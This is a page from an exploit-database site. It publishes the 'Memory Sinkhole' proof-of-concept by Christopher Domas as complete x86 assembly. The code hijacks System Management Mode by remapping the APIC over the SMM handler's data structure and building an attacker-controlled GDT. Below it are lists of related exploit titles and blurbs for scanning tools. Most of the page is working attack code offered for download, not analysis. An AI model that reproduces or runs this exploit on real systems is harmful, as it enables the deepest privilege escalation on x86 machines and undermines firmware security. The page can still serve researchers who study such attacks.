Menu

Search for hundreds of thousands of exploits

"Linux Kernel (x86) - Memory Sinkhole Privilege Escalation"

Author

Exploit author

"Christopher Domas"

Platform

Exploit platform

linux_x86

Release date

Exploit published date

2015-08-07

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
; memory sinkhole proof of concept
; hijack ring -2 execution through the apic overlay attack.

; deployed in ring 0

; the SMBASE register of the core under attack
TARGET_SMBASE equ 0x1f5ef800
 
; the location of the attack GDT.
; this is determined by which register will be read out of the APIC
; for the GDT base.  the APIC registers at this range are hardwired,
; and outside of our control; the SMM code will generally be reading 
; from APIC registers in the 0xb00 range if the SMM handler is page 
; aligned, or the 0x300 range if the SMM handler is not page aligned. 
; the register will be 0 if the SMM handler is aligned to a page 
; boundary, or 0x10000 if it is not.
GDT_ADDRESS equ 0x10000
 
; the value added to SMBASE by the SMM handler to compute the
; protected mode far jump offset.  we could eliminate the need for an
; exact value with a nop sled in the hook.
FJMP_OFFSET equ 0x8097
 
; the offset of the SMM DSC structure from which the handler loads
; critical information
DSC_OFFSET equ 0xfb00
 
; the descriptor value used in the SMM handlers far jump
DESCRIPTOR_ADDRESS equ 0x10
 
; MSR number for the APIC location
APIC_BASE_MSR equ 0x1b
 
; the target memory address to sinkhole
SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000)
 
; we will hijack the default SMM handler and point it to a payload
; at this physical address.
PAYLOAD_OFFSET equ 0x1000

; compute the desired base address of the CS descriptor in the GDT.
; this is calculated so that the fjmp performed in SMM is perfectly
; redirected to the payload hook at PAYLOAD_OFFSET.
CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET)
 
; we target the boot strap processor for hijacking.
APIC_BSP equ 0x100
 
; the APIC must be activated for the attack to work.
APIC_ACTIVE equ 0x800
 
;;; begin attack ;;;
 
; clear the processor caches,
; to prevent bypassing the memory sinkhole on data fetches
wbinvd
 
; construct a hijack GDT in memory under our control
; note: assume writing to identity mapped memory.
; if non-identity mapped, translate these through the page tables first.
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4],
	(CS_BASE&0xff000000) | (0x00cf9a00) | 
		(CS_BASE&0x00ff0000)>>16
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0],
	(CS_BASE&0x0000ffff)<<16 | 0xffff
 
; remap the APIC to sinkhole SMMs DSC structure
mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP
mov edx, 0
mov ecx, APIC_BASE_MSR
wrmsr
 
; wait for a periodic SMI to be triggered
jmp $
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2017-10-23 "Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)" remote linux_x86 Metasploit
2017-10-23 "Unitrends UEB 9 - http api/storage Remote Root (Metasploit)" remote linux_x86 Metasploit
2017-06-28 "Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation" local linux_x86 "Qualys Corporation"
2017-06-28 "Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation" local linux_x86 "Qualys Corporation"
2017-06-28 "Linux Kernel - 'offset2lib' Stack Clash" local linux_x86 "Qualys Corporation"
2016-09-27 "Linux Kernel 4.6.3 (x86) - 'Netfilter' Local Privilege Escalation (Metasploit)" local linux_x86 Metasploit
2016-04-06 "Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited" dos linux_x86 "Hector Marco & Ismael Ripoll"
2015-11-19 "Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow" dos linux_x86 "Google Security Research"
2015-08-07 "Linux Kernel (x86) - Memory Sinkhole Privilege Escalation" local linux_x86 "Christopher Domas"
2015-04-13 "Samba < 3.6.2 (x86) - Denial of Service (PoC)" dos linux_x86 sleepya
Release Date Title Type Platform Author
2015-08-07 "Linux Kernel (x86) - Memory Sinkhole Privilege Escalation" local linux_x86 "Christopher Domas" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected